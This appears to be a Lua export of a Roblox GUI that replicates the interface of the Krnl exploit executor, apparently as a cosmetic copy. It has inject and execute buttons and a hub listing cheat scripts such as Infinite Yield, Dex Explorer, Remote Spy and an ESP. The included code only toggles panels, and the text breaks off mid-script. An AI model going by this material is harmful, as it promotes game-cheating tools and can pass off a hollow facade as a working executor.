RemoteHighlight__2.BackgroundTransparency = 1.000 RemoteHighlight__2.Size = UDim2.new(1, 0, 1, 0) RemoteHighlight__2.ZIndex = 5 RemoteHighlight__2.Font = Enum.Font.Code RemoteHighlight__2.Text = "" RemoteHighlight__2.TextColor3 = Color3.fromRGB(0, 144, 255) RemoteHighlight__2.TextSize = 14.000 RemoteHighlight__2.TextXAlignment = Enum.TextXAlignment.Left RemoteHighlight__2.TextYAlignment = Enum.TextYAlignment.Top Strings__2.Name = "Strings_" Strings__2.Parent = Source_2 Strings__2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Strings__2.BackgroundTransparency = 1.000 Strings__2.Size = UDim2.new(1, 0, 1, 0) Strings__2.ZIndex = 5 Strings__2.Font = Enum.Font.Code Strings__2.Text = "" Strings__2.TextColor3 = Color3.fromRGB(229, 164, 60) Strings__2.TextSize = 14.000 Strings__2.TextXAlignment = Enum.TextXAlignment.Left Strings__2.TextYAlignment = Enum.TextYAlignment.Top Tokens__2.Name = "Tokens_" Tokens__2.Parent = Source_2 Tokens__2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Tokens__2.BackgroundTransparency = 1.000 Tokens__2.Size = UDim2.new(1, 0, 1, 0) Tokens__2.ZIndex = 5 Tokens__2.Font = Enum.Font.Code Tokens__2.Text = "" Tokens__2.TextColor3 = Color3.fromRGB(255, 255, 255) Tokens__2.TextSize = 14.000 Tokens__2.TextXAlignment = Enum.TextXAlignment.Left Tokens__2.TextYAlignment = Enum.TextYAlignment.Top Numbers__2.Name = "Numbers_" Numbers__2.Parent = Source_2 Numbers__2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Numbers__2.BackgroundTransparency = 1.000 Numbers__2.Size = UDim2.new(1, 0, 1, 0) Numbers__2.ZIndex = 4 Numbers__2.Font = Enum.Font.Code Numbers__2.Text = "" Numbers__2.TextColor3 = Color3.fromRGB(142, 71, 213) Numbers__2.TextSize = 14.000 Numbers__2.TextXAlignment = Enum.TextXAlignment.Left Numbers__2.TextYAlignment = Enum.TextYAlignment.Top Lines_2.Name = "Lines" Lines_2.Parent = EditorFrame_2 Lines_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Lines_2.BackgroundTransparency = 1.000 Lines_2.Position = UDim2.new(-0.00924214441, 0, 0, 0) Lines_2.Size = UDim2.new(0, 30, 1, 0) Lines_2.ZIndex = 4 Lines_2.Font = Enum.Font.SourceSans Lines_2.Text = "1\\n" Lines_2.TextColor3 = Color3.fromRGB(255, 255, 255) Lines_2.TextSize = 15.000 Lines_2.TextYAlignment = Enum.TextYAlignment.Top Execute.Name = "Execute" Execute.Parent = MainGUI Execute.BackgroundColor3 = Color3.fromRGB(44, 44, 44) Execute.BorderColor3 = Color3.fromRGB(44, 44, 44) Execute.Position = UDim2.new(0.00500000967, 0, 0.910000026, 0) Execute.Size = UDim2.new(0.143999994, 0, 0.074000001, 0) Execute.Font = Enum.Font.Arial Execute.Text = "EXECUTE" Execute.TextColor3 = Color3.fromRGB(255, 255, 255) Execute.TextScaled = true Execute.TextSize = 14.000 Execute.TextWrapped = true UITextSizeConstraint_16.Parent = Execute UITextSizeConstraint_16.MaxTextSize = 14 Clear.Name = "Clear" Clear.Parent = MainGUI Clear.BackgroundColor3 = Color3.fromRGB(44, 44, 44) Clear.BorderColor3 = Color3.fromRGB(44, 44, 44) Clear.Position = UDim2.new(0.158899993, 0, 0.910000026, 0) Clear.Size = UDim2.new(0.143999994, 0, 0.074000001, 0) Clear.Font = Enum.Font.Arial Clear.Text = "CLEAR" Clear.TextColor3 = Color3.fromRGB(255, 255, 255) Clear.TextScaled = true Clear.TextSize = 14.000 Clear.TextWrapped = true UITextSizeConstraint_17.Parent = Clear UITextSizeConstraint_17.MaxTextSize = 14 OpenFileButton.Name = "Open File Button" OpenFileButton.Parent = MainGUI OpenFileButton.BackgroundColor3 = Color3.fromRGB(44, 44, 44) OpenFileButton.BorderColor3 = Color3.fromRGB(44, 44, 44) OpenFileButton.Position = UDim2.new(0.31099999, 0, 0.910000026, 0) OpenFileButton.Size = UDim2.new(0.143999994, 0, 0.074000001, 0) OpenFileButton.Font = Enum.Font.Arial OpenFileButton.Text = "OPEN FILE" OpenFileButton.TextColor3 = Color3.fromRGB(255, 255, 255) OpenFileButton.TextScaled = true OpenFileButton.TextSize = 14.000 OpenFileButton.TextWrapped = true UITextSizeConstraint_18.Parent = OpenFileButton UITextSizeConstraint_18.MaxTextSize = 14 SaveFileButton.Name = "Save File Button" SaveFileButton.Parent = MainGUI SaveFileButton.BackgroundColor3 = Color3.fromRGB(44, 44, 44) SaveFileButton.BorderColor3 = Color3.fromRGB(44, 44, 44) SaveFileButton.Position = UDim2.new(0.461996198, 0, 0.910000026, 0) SaveFileButton.Size = UDim2.new(0.143999994, 0, 0.074000001, 0) SaveFileButton.Font = Enum.Font.Arial SaveFileButton.Text = "SAVE FILE" SaveFileButton.TextColor3 = Color3.fromRGB(255, 255, 255) SaveFileButton.TextScaled = true SaveFileButton.TextSize = 14.000 SaveFileButton.TextWrapped = true UITextSizeConstraint_19.Parent = SaveFileButton UITextSizeConstraint_19.MaxTextSize = 14 InjectButton.Name = "Inject Button" InjectButton.Parent = MainGUI InjectButton.BackgroundColor3 = Color3.fromRGB(44, 44, 44) InjectButton.BorderColor3 = Color3.fromRGB(44, 44, 44) InjectButton.Position = UDim2.new(0.611999989, 0, 0.910000026, 0) InjectButton.Size = UDim2.new(0.143999994, 0, 0.074000001, 0) InjectButton.Font = Enum.Font.Arial InjectButton.Text = "INJECT" InjectButton.TextColor3 = Color3.fromRGB(255, 255, 255) InjectButton.TextScaled = true InjectButton.TextSize = 14.000 InjectButton.TextWrapped = true UITextSizeConstraint_20.Parent = InjectButton UITextSizeConstraint_20.MaxTextSize = 14 OptionButton.Name = "Option Button" OptionButton.Parent = MainGUI OptionButton.BackgroundColor3 = Color3.fromRGB(44, 44, 44) OptionButton.BorderColor3 = Color3.fromRGB(44, 44, 44) OptionButton.Position = UDim2.new(0.84799999, 0, 0.910000026, 0) OptionButton.Size = UDim2.new(0.143999994, 0, 0.074000001, 0) OptionButton.Font = Enum.Font.Arial OptionButton.Text = "OPTION" OptionButton.TextColor3 = Color3.fromRGB(255, 255, 255) OptionButton.TextScaled = true OptionButton.TextSize = 14.000 OptionButton.TextWrapped = true UITextSizeConstraint_21.Parent = OptionButton UITextSizeConstraint_21.MaxTextSize = 14 ScriptHub.Name = "Script Hub" ScriptHub.Parent = MainGUI ScriptHub.Active = true ScriptHub.BackgroundColor3 = Color3.fromRGB(33, 33, 33) ScriptHub.BorderColor3 = Color3.fromRGB(33, 33, 33) ScriptHub.Position = UDim2.new(0.821767807, 0, 0.0278668515, 0) ScriptHub.Size = UDim2.new(0.170232087, 0, 0.865870535, 0) ScriptHub.ScrollBarThickness = 7 UIAspectRatioConstraint.Parent = KrnlGUI UIAspectRatioConstraint.AspectRatio = 1.993 InjectedMessgae.Name = "InjectedMessgae" InjectedMessgae.Parent = KrnlGUI InjectedMessgae.BackgroundColor3 = Color3.fromRGB(255, 255, 255) InjectedMessgae.BorderColor3 = Color3.fromRGB(245, 245, 255) InjectedMessgae.Position = UDim2.new(0.309756339, 0, 0.298481524, 0) InjectedMessgae.Size = UDim2.new(0.347566962, 0, 0.399907291, 0) InjectedMessgae.Visible = false Frame_2.Parent = InjectedMessgae Frame_2.BackgroundColor3 = Color3.fromRGB(245, 245, 255) Frame_2.BorderColor3 = Color3.fromRGB(245, 245, 255) Frame_2.Size = UDim2.new(1, 0, 0.224637687, 0) Xbutton_2.Name = "X button" Xbutton_2.Parent = Frame_2 Xbutton_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Xbutton_2.BackgroundTransparency = 1.000 Xbutton_2.Position = UDim2.new(0.849372387, 0, 0, 0) Xbutton_2.Size = UDim2.new(0.142259419, 0, 1, 0) Xbutton_2.Font = Enum.Font.SourceSans Xbutton_2.Text = "X" Xbutton_2.TextColor3 = Color3.fromRGB(0, 0, 0) Xbutton_2.TextScaled = true Xbutton_2.TextSize = 30.000 Xbutton_2.TextWrapped = true UITextSizeConstraint_22.Parent = Xbutton_2 UITextSizeConstraint_22.MaxTextSize = 30 TextLabel_2.Parent = Frame_2 TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_2.BackgroundTransparency = 1.000 TextLabel_2.Position = UDim2.new(0.0379998684, 0, 0.129181385, 0) TextLabel_2.Size = UDim2.new(0.242677823, 0, 0.85275197, 0) TextLabel_2.Font = Enum.Font.SourceSans TextLabel_2.Text = "Krnl" TextLabel_2.TextColor3 = Color3.fromRGB(0, 0, 0) TextLabel_2.TextSize = 19.000 TextLabel_2.TextWrapped = true TextLabel_2.TextXAlignment = Enum.TextXAlignment.Left Frame_3.Parent = InjectedMessgae Frame_3.BackgroundColor3 = Color3.fromRGB(245, 245, 255) Frame_3.BorderColor3 = Color3.fromRGB(245, 245, 255) Frame_3.Position = UDim2.new(0, 0, 0.695652127, 0) Frame_3.Size = UDim2.new(1, 0, 0.304347813, 0) Okbutton.Name = "Ok button" Okbutton.Parent = Frame_3 Okbutton.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Okbutton.BorderColor3 = Color3.fromRGB(255, 255, 255) Okbutton.Position = UDim2.new(0.646688402, 0, 0.214285731, 0) Okbutton.Size = UDim2.new(0.313807517, 0, 0.5, 0) Okbutton.Font = Enum.Font.Arial Okbutton.Text = "OK" Okbutton.TextColor3 = Color3.fromRGB(0, 0, 0) Okbutton.TextScaled = true Okbutton.TextSize = 13.000 Okbutton.TextWrapped = true UITextSizeConstraint_23.Parent = Okbutton UITextSizeConstraint_23.MaxTextSize = 13 TextLabel_3.Parent = InjectedMessgae TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_3.BackgroundTransparency = 1.000 TextLabel_3.Position = UDim2.new(0.0631046072, 0, 0.379999995, 0) TextLabel_3.Size = UDim2.new(0.870292902, 0, 0.231884062, 0) TextLabel_3.Font = Enum.Font.SourceSans TextLabel_3.Text = "Already injected!" TextLabel_3.TextColor3 = Color3.fromRGB(0, 0, 0) TextLabel_3.TextScaled = true TextLabel_3.TextSize = 15.000 TextLabel_3.TextWrapped = true TextLabel_3.TextXAlignment = Enum.TextXAlignment.Left UITextSizeConstraint_24.Parent = TextLabel_3 UITextSizeConstraint_24.MaxTextSize = 15 HScriptsHub.Name = "HScriptsHub" HScriptsHub.Parent = KrnlGUI HScriptsHub.BackgroundColor3 = Color3.fromRGB(29, 29, 29) HScriptsHub.BorderColor3 = Color3.fromRGB(43, 43, 43) HScriptsHub.Position = UDim2.new(0.231226563, 0, 0.165179193, 0) HScriptsHub.Size = UDim2.new(0.202141464, 0, 0.518720329, 0) HScriptsHub.Visible = false DexExplorer.Name = "Dex Explorer" DexExplorer.Parent = HScriptsHub DexExplorer.BackgroundColor3 = Color3.fromRGB(255, 255, 255) DexExplorer.BackgroundTransparency = 1.000 DexExplorer.Size = UDim2.new(1, 0, 0.128491625, 0) DexExplorer.Font = Enum.Font.SourceSans DexExplorer.Text = " Dex Explorer" DexExplorer.TextColor3 = Color3.fromRGB(255, 255, 255) DexExplorer.TextScaled = true DexExplorer.TextSize = 15.000 DexExplorer.TextWrapped = true DexExplorer.TextXAlignment = Enum.TextXAlignment.Left UITextSizeConstraint_25.Parent = DexExplorer UITextSizeConstraint_25.MaxTextSize = 15 OpenGui.Name = "OpenGui" OpenGui.Parent = HScriptsHub OpenGui.BackgroundColor3 = Color3.fromRGB(255, 255, 255) OpenGui.BackgroundTransparency = 1.000 OpenGui.Position = UDim2.new(0, 0, 0.128491625, 0) OpenGui.Size = UDim2.new(1, 0, 0.128491625, 0) OpenGui.Font = Enum.Font.SourceSans OpenGui.Text = " OpenGui" OpenGui.TextColor3 = Color3.fromRGB(255, 255, 255) OpenGui.TextScaled = true OpenGui.TextSize = 15.000 OpenGui.TextWrapped = true OpenGui.TextXAlignment = Enum.TextXAlignment.Left UITextSizeConstraint_26.Parent = OpenGui UITextSizeConstraint_26.MaxTextSize = 15 RemoteSpy.Name = "RemoteSpy" RemoteSpy.Parent = HScriptsHub RemoteSpy.BackgroundColor3 = Color3.fromRGB(255, 255, 255) RemoteSpy.BackgroundTransparency = 1.000 RemoteSpy.Position = UDim2.new(0, 0, 0.25698325, 0) RemoteSpy.Size = UDim2.new(1, 0, 0.128491625, 0) RemoteSpy.Font = Enum.Font.SourceSans RemoteSpy.Text = " Remote Spy" RemoteSpy.TextColor3 = Color3.fromRGB(255, 255, 255) RemoteSpy.TextScaled = true RemoteSpy.TextSize = 15.000 RemoteSpy.TextWrapped = true RemoteSpy.TextXAlignment = Enum.TextXAlignment.Left UITextSizeConstraint_27.Parent = RemoteSpy UITextSizeConstraint_27.MaxTextSize = 15 DarkDex.Name = "DarkDex" DarkDex.Parent = HScriptsHub DarkDex.BackgroundColor3 = Color3.fromRGB(255, 255, 255) DarkDex.BackgroundTransparency = 1.000 DarkDex.Position = UDim2.new(0, 0, 0.385474861, 0) DarkDex.Size = UDim2.new(1, 0, 0.128491625, 0) DarkDex.Font = Enum.Font.SourceSans DarkDex.Text = " Dark Dex" DarkDex.TextColor3 = Color3.fromRGB(255, 255, 255) DarkDex.TextScaled = true DarkDex.TextSize = 15.000 DarkDex.TextWrapped = true DarkDex.TextXAlignment = Enum.TextXAlignment.Left UITextSizeConstraint_28.Parent = DarkDex UITextSizeConstraint_28.MaxTextSize = 15 UnamedEsp.Name = "UnamedEsp" UnamedEsp.Parent = HScriptsHub UnamedEsp.BackgroundColor3 = Color3.fromRGB(255, 255, 255) UnamedEsp.BackgroundTransparency = 1.000 UnamedEsp.Position = UDim2.new(0, 0, 0.513966501, 0) UnamedEsp.Size = UDim2.new(1, 0, 0.128491625, 0) UnamedEsp.Font = Enum.Font.SourceSans UnamedEsp.Text = " Unnamed ESP" UnamedEsp.TextColor3 = Color3.fromRGB(255, 255, 255) UnamedEsp.TextScaled = true UnamedEsp.TextSize = 15.000 UnamedEsp.TextWrapped = true UnamedEsp.TextXAlignment = Enum.TextXAlignment.Left UITextSizeConstraint_29.Parent = UnamedEsp UITextSizeConstraint_29.MaxTextSize = 15 IYFE.Name = "IYFE" IYFE.Parent = HScriptsHub IYFE.BackgroundColor3 = Color3.fromRGB(255, 255, 255) IYFE.BackgroundTransparency = 1.000 IYFE.Position = UDim2.new(0, 0, 0.642458141, 0) IYFE.Size = UDim2.new(1, 0, 0.128491625, 0) IYFE.Font = Enum.Font.SourceSans IYFE.Text = " Infinite Yield" IYFE.TextColor3 = Color3.fromRGB(255, 255, 255) IYFE.TextScaled = true IYFE.TextSize = 15.000 IYFE.TextWrapped = true IYFE.TextXAlignment = Enum.TextXAlignment.Left UITextSizeConstraint_30.Parent = IYFE UITextSizeConstraint_30.MaxTextSize = 15 OwlHub.Name = "OwlHub" OwlHub.Parent = HScriptsHub OwlHub.BackgroundColor3 = Color3.fromRGB(255, 255, 255) OwlHub.BackgroundTransparency = 1.000 OwlHub.Position = UDim2.new(0, 0, 0.770949781, 0) OwlHub.Size = UDim2.new(1, 0, 0.128491625, 0) OwlHub.Font = Enum.Font.SourceSans OwlHub.Text = " Owl Hub" OwlHub.TextColor3 = Color3.fromRGB(255, 255, 255) OwlHub.TextScaled = true OwlHub.TextSize = 15.000 OwlHub.TextWrapped = true OwlHub.TextXAlignment = Enum.TextXAlignment.Left UITextSizeConstraint_31.Parent = OwlHub UITextSizeConstraint_31.MaxTextSize = 15 HoHoHub.Name = "HoHo Hub" HoHoHub.Parent = HScriptsHub HoHoHub.BackgroundColor3 = Color3.fromRGB(255, 255, 255) HoHoHub.BackgroundTransparency = 1.000 HoHoHub.Position = UDim2.new(0, 0, 0.899441361, 0) HoHoHub.Size = UDim2.new(1, 0, 0.100558661, 0) HoHoHub.Font = Enum.Font.SourceSans HoHoHub.Text = " Hoho Hub" HoHoHub.TextColor3 = Color3.fromRGB(255, 255, 255) HoHoHub.TextScaled = true HoHoHub.TextSize = 15.000 HoHoHub.TextWrapped = true HoHoHub.TextXAlignment = Enum.TextXAlignment.Left UITextSizeConstraint_32.Parent = HoHoHub UITextSizeConstraint_32.MaxTextSize = 15 BlueLight.Name = "Blue Light" BlueLight.Parent = KrnlGUI BlueLight.BackgroundColor3 = Color3.fromRGB(6, 139, 255) BlueLight.BorderColor3 = Color3.fromRGB(6, 139, 255) BlueLight.Size = UDim2.new(0.999000013, 0, 0.00300000003, 0) CreditsW.Name = "CreditsW" CreditsW.Parent = KrnlGUI CreditsW.BackgroundColor3 = Color3.fromRGB(36, 36, 36) CreditsW.BorderColor3 = Color3.fromRGB(36, 36, 36) CreditsW.Position = UDim2.new(1.00925303, 0, 0.0115915686, 0) CreditsW.Size = UDim2.new(0.434822261, 0, 0.5361076, 0) CreditsW.Visible = false Frame_4.Parent = CreditsW Frame_4.BackgroundColor3 = Color3.fromRGB(28, 28, 29) Frame_4.BorderColor3 = Color3.fromRGB(28, 28, 29) Frame_4.Size = UDim2.new(1, 0, 0.175989032, 0) Xbutton_3.Name = "X button" Xbutton_3.Parent = Frame_4 Xbutton_3.BackgroundColor3 = Color3.fromRGB(0, 0, 0) Xbutton_3.BackgroundTransparency = 1.000 Xbutton_3.Position = UDim2.new(0.879472733, 0, 0, 0) Xbutton_3.Size = UDim2.new(0.118848056, 0, 1, 0) Xbutton_3.Font = Enum.Font.SourceSans Xbutton_3.Text = "X" Xbutton_3.TextColor3 = Color3.fromRGB(255, 255, 255) Xbutton_3.TextScaled = true Xbutton_3.TextSize = 30.000 Xbutton_3.TextWrapped = true UITextSizeConstraint_33.Parent = Xbutton_3 UITextSizeConstraint_33.MaxTextSize = 30 TextLabel_4.Parent = CreditsW TextLabel_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_4.BackgroundTransparency = 1.000 TextLabel_4.Position = UDim2.new(0.435993314, 0, 0.174594522, 0) TextLabel_4.Size = UDim2.new(0.535571635, 0, 0.145397589, 0) TextLabel_4.Font = Enum.Font.SourceSans TextLabel_4.Text = "UI Replicated" TextLabel_4.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_4.TextScaled = true TextLabel_4.TextSize = 17.000 TextLabel_4.TextWrapped = true TextLabel_4.TextXAlignment = Enum.TextXAlignment.Left UITextSizeConstraint_34.Parent = TextLabel_4 UITextSizeConstraint_34.MaxTextSize = 17 TextLabel_5.Parent = CreditsW TextLabel_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_5.BackgroundTransparency = 1.000 TextLabel_5.Position = UDim2.new(0.435993314, 0, 0.315135062, 0) TextLabel_5.Size = UDim2.new(0.535571635, 0, 0.145397589, 0) TextLabel_5.Font = Enum.Font.SourceSans TextLabel_5.Text = "AZY#0348" TextLabel_5.TextColor3 = Color3.fromRGB(126, 126, 126) TextLabel_5.TextScaled = true TextLabel_5.TextSize = 15.000 TextLabel_5.TextWrapped = true TextLabel_5.TextXAlignment = Enum.TextXAlignment.Left UITextSizeConstraint_35.Parent = TextLabel_5 UITextSizeConstraint_35.MaxTextSize = 15 ImageLabel_4.Parent = CreditsW ImageLabel_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ImageLabel_4.BackgroundTransparency = 1.000 ImageLabel_4.Position = UDim2.new(0.0468227416, 0, 0.225141764, 0) ImageLabel_4.Size = UDim2.new(0.334448159, 0, 0.540540516, 0) ImageLabel_4.Image = "rbxassetid://11671355800" OtherTab.Name = "OtherTab" OtherTab.Parent = KrnlGUI OtherTab.BackgroundColor3 = Color3.fromRGB(29, 29, 29) OtherTab.BorderColor3 = Color3.fromRGB(43, 43, 43) OtherTab.Position = UDim2.new(0.339520067, 0, 0.16753611, 0) OtherTab.Size = UDim2.new(0.202141464, 0, 0.130404547, 0) OtherTab.Visible = false WHy.Name = "WHy" WHy.Parent = OtherTab WHy.BackgroundColor3 = Color3.fromRGB(255, 255, 255) WHy.BackgroundTransparency = 1.000 WHy.Position = UDim2.new(0, 0, 0.466666698, 0) WHy.Size = UDim2.new(1, 0, 0.513516545, 0) WHy.Font = Enum.Font.SourceSans WHy.Text = " Why you here?" WHy.TextColor3 = Color3.fromRGB(255, 255, 255) WHy.TextScaled = true WHy.TextSize = 15.000 WHy.TextWrapped = true WHy.TextXAlignment = Enum.TextXAlignment.Left UITextSizeConstraint_36.Parent = WHy UITextSizeConstraint_36.MaxTextSize = 15 Nope.Name = "Nope" Nope.Parent = OtherTab Nope.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Nope.BackgroundTransparency = 1.000 Nope.Size = UDim2.new(1, 0, 0.513516545, 0) Nope.Font = Enum.Font.SourceSans Nope.Text = " No Key >:)" Nope.TextColor3 = Color3.fromRGB(255, 255, 255) Nope.TextScaled = true Nope.TextSize = 15.000 Nope.TextWrapped = true Nope.TextXAlignment = Enum.TextXAlignment.Left UITextSizeConstraint_37.Parent = Nope UITextSizeConstraint_37.MaxTextSize = 15 FileTab.Name = "FileTab" FileTab.Parent = KrnlGUI FileTab.BackgroundColor3 = Color3.fromRGB(29, 29, 29) FileTab.BorderColor3 = Color3.fromRGB(43, 43, 43) FileTab.Position = UDim2.new(0.00213287491, 0, 0.164638236, 0) FileTab.Size = UDim2.new(0.202141464, 0, 0.130404547, 0) FileTab.Visible = false KillTask.Name = "KillTask" KillTask.Parent = FileTab KillTask.BackgroundColor3 = Color3.fromRGB(255, 255, 255) KillTask.BackgroundTransparency = 1.000 KillTask.Position = UDim2.new(0, 0, 0.51111114, 0) KillTask.Size = UDim2.new(1, 0, 0.513516545, 0) KillTask.Font = Enum.Font.SourceSans KillTask.Text = " Kill Roblox" KillTask.TextColor3 = Color3.fromRGB(255, 255, 255) KillTask.TextScaled = true KillTask.TextSize = 15.000 KillTask.TextWrapped = true KillTask.TextXAlignment = Enum.TextXAlignment.Left UITextSizeConstraint_38.Parent = KillTask UITextSizeConstraint_38.MaxTextSize = 15 Inject.Name = "Inject" Inject.Parent = FileTab Inject.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Inject.BackgroundTransparency = 1.000 Inject.Position = UDim2.new(0, 0, -0.0444444418, 0) Inject.Size = UDim2.new(1, 0, 0.513516545, 0) Inject.Font = Enum.Font.SourceSans Inject.Text = " Inject" Inject.TextColor3 = Color3.fromRGB(255, 255, 255) Inject.TextScaled = true Inject.TextSize = 15.000 Inject.TextWrapped = true Inject.TextXAlignment = Enum.TextXAlignment.Left UITextSizeConstraint_39.Parent = Inject UITextSizeConstraint_39.MaxTextSize = 15 GamesOpenGUI.Name = "GamesOpenGUI" GamesOpenGUI.Parent = KrnlGUI GamesOpenGUI.BackgroundColor3 = Color3.fromRGB(255, 255, 255) GamesOpenGUI.BorderColor3 = Color3.fromRGB(245, 245, 255) GamesOpenGUI.Position = UDim2.new(0.309756339, 0, 0.298481524, 0) GamesOpenGUI.Size = UDim2.new(0.347566962, 0, 0.399907291, 0) GamesOpenGUI.Visible = false Frame_5.Parent = GamesOpenGUI Frame_5.BackgroundColor3 = Color3.fromRGB(245, 245, 255) Frame_5.BorderColor3 = Color3.fromRGB(245, 245, 255) Frame_5.Size = UDim2.new(1, 0, 0.224637687, 0) Xbutton_4.Name = "X button" Xbutton_4.Parent = Frame_5 Xbutton_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Xbutton_4.BackgroundTransparency = 1.000 Xbutton_4.Position = UDim2.new(0.849372387, 0, 0, 0) Xbutton_4.Size = UDim2.new(0.142259419, 0, 1, 0) Xbutton_4.Font = Enum.Font.SourceSans Xbutton_4.Text = "X" Xbutton_4.TextColor3 = Color3.fromRGB(0, 0, 0) Xbutton_4.TextScaled = true Xbutton_4.TextSize = 30.000 Xbutton_4.TextWrapped = true UITextSizeConstraint_40.Parent = Xbutton_4 UITextSizeConstraint_40.MaxTextSize = 30 Frame_6.Parent = GamesOpenGUI Frame_6.BackgroundColor3 = Color3.fromRGB(245, 245, 255) Frame_6.BorderColor3 = Color3.fromRGB(245, 245, 255) Frame_6.Position = UDim2.new(0, 0, 0.695652127, 0) Frame_6.Size = UDim2.new(1, 0, 0.304347813, 0) Okbutton_2.Name = "Ok button" Okbutton_2.Parent = Frame_6 Okbutton_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Okbutton_2.BorderColor3 = Color3.fromRGB(255, 255, 255) Okbutton_2.Position = UDim2.new(0.646688402, 0, 0.214285731, 0) Okbutton_2.Size = UDim2.new(0.313807517, 0, 0.5, 0) Okbutton_2.Font = Enum.Font.Arial Okbutton_2.Text = "OK" Okbutton_2.TextColor3 = Color3.fromRGB(0, 0, 0) Okbutton_2.TextScaled = true Okbutton_2.TextSize = 13.000 Okbutton_2.TextWrapped = true UITextSizeConstraint_41.Parent = Okbutton_2 UITextSizeConstraint_41.MaxTextSize = 13 TextLabel_6.Parent = GamesOpenGUI TextLabel_6.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_6.BackgroundTransparency = 1.000 TextLabel_6.Position = UDim2.new(0.0379999988, 0, 0.379999995, 0) TextLabel_6.Size = UDim2.new(0.870292902, 0, 0.231884062, 0) TextLabel_6.Font = Enum.Font.SourceSans TextLabel_6.Text = "Disabled as the most scripts are patched." TextLabel_6.TextColor3 = Color3.fromRGB(0, 0, 0) TextLabel_6.TextSize = 15.000 TextLabel_6.TextWrapped = true TextLabel_6.TextXAlignment = Enum.TextXAlignment.Left UITextSizeConstraint_42.Parent = TextLabel_6 UITextSizeConstraint_42.MaxTextSize = 15 UIAspectRatioConstraint_2.Parent = KRNL UIAspectRatioConstraint_2.AspectRatio = 1.691 FloatingGUI.Name = "FloatingGUI" FloatingGUI.Parent = KRNL FloatingGUI.BackgroundColor3 = Color3.fromRGB(255, 255, 255) FloatingGUI.BackgroundTransparency = 1.000 FloatingGUI.Position = UDim2.new(0, 599, 0, 62) FloatingGUI.Size = UDim2.new(0, 39, 0, 39) FloatingGUI.Image = "rbxassetid://11671355800" -- Scripts: local function JKSXXR_fake_script() -- FileButton.LocalScript local script = Instance.new('LocalScript', FileButton) local Button = script.Parent local gui = script.Parent.Parent.FileTab Button.MouseButton1Up:Connect(function() if gui.Visible == false then gui.Visible = true else gui.Visible = false end end) end coroutine.wrap(JKSXXR_fake_script)() local function IWZIAOM_fake_script() -- CreditsButton.LocalScript local script = Instance.new('LocalScript', CreditsButton) local Button = script.Parent local gui = script.Parent.Parent.CreditsW Button.MouseButton1Up:Connect(function() if gui.Visible == false then gui.Visible = true else gui.Visible = false end end) end coroutine.wrap(IWZIAOM_fake_script)() local function BDJX_fake_script() -- GamesButton.LocalScript local script = Instance.new('LocalScript', GamesButton) local btn = script.Parent local Gui = script.Parent.Parent.GamesOpenGUI btn.MouseButton1Click:Connect(function() Gui.Visible = true end) end coroutine.wrap(BDJX_fake_script)() local function BOJDWR_fake_script() -- HotScriptsButton.LocalScript local script = Instance.new('LocalScript', HotScriptsButton) local Button = script.Parent local gui = script.Parent.Parent.HScriptsHub Button.MouseButton1Up:Connect(function() if gui.Visible == false then gui.Visible = true else gui.Visible = false end end) end coroutine.wrap(BOJDWR_fake_script)() local function RZSXL_fake_script() -- OthersButton.LocalScript local script = Instance.new('LocalScript', OthersButton) local Button = script.Parent local gui = script.Parent.Parent.OtherTab Button.MouseButton1Up:Connect(function() if gui.Visible == false then gui.Visible = true else gui.Visible = false end end) end coroutine.wrap(RZSXL_fake_script)() local function OPNVFDR_fake_script() -- Xbutton.LocalScript local script = Instance.new('LocalScript', Xbutton) local GUI = script.Parent.Parent.Parent.Parent local btn = script.Parent btn.MouseButton1Click:Connect(function() GUI:Destroy() end) end coroutine.wrap(OPNVFDR_fake_script)() local function NETW_fake_script() -- button.LocalScript local script = Instance.new('LocalScript', button) local btn = script.Parent local Gui = script.Parent.Parent.Parent local Krnl = script.Parent.Parent.Parent.Parent.FloatingGUI btn.MouseButton1Click:Connect(function() Gui.Visible = false Krnl.Visible = true end) end coroutine.wrap(NETW_fake_script)() local function BWCCXZZ_fake_script() -- TextButton.LocalScript local script = Instance.new('LocalScript', TextButton) local button = script.Parent local SF1 = script.Parent.Parent.Parent.Parent.ScrollingFrame1 local SF2 = script.Parent.Parent.Parent.Parent.ScrollingFrame2 button.MouseButton1Click:Connect(function() if SF1.Visible == false then SF1.Visible = true SF2.Visible = false else end end) end coroutine.wrap(BWCCXZZ_fake_script)() local function AFYRFVF_fake_script() -- TextButton_2.LocalScript local script = Instance.new('LocalScript', TextButton_2) local mbutton1 = script.Parent.Parent local button = script.Parent local SF1 = script.Parent.Parent.Parent.Parent.ScrollingFrame1 local text1 = script.Parent.Parent.Parent.Parent.ScrollingFrame1.ImageLabel.EditorFrame.Source local mbutton2 = script.Parent.Parent.Parent.Script2 button.MouseButton1Click:Connect(function() if mbutton2.Visible == false then script.Parent.Parent.Parent.Parent.Parent.Parent.Parent.Parent.KRNL:Destroy() end end) end coroutine.wrap(AFYRFVF_fake_script)() local function QDTSXTQ_fake_script() -- TextButton_3.LocalScript local script = Instance.new('LocalScript', TextButton_3) local button = script.Parent local SF1 = script.Parent.Parent.Parent.Parent.ScrollingFrame1 local SF2 = script.Parent.Parent.Parent.Parent.ScrollingFrame2 button.MouseButton1Click:Connect(function() if SF2.Visible == false then SF2.Visible = true SF1.Visible = false else end end) end coroutine.wrap(QDTSXTQ_fake_script)() local function SUNEU_fake_script() -- TextButton_4.LocalScript local script = Instance.new('LocalScript', TextButton_4) local mbutton = script.Parent.Parent local button = script.Parent local SF2 = script.Parent.Parent.Parent.Parent.ScrollingFrame2 local text2 = script.Parent.Parent.Parent.Parent.ScrollingFrame2.ImageLabel.EditorFrame.Source local ab = script.Parent.Parent.Parent.addbutton 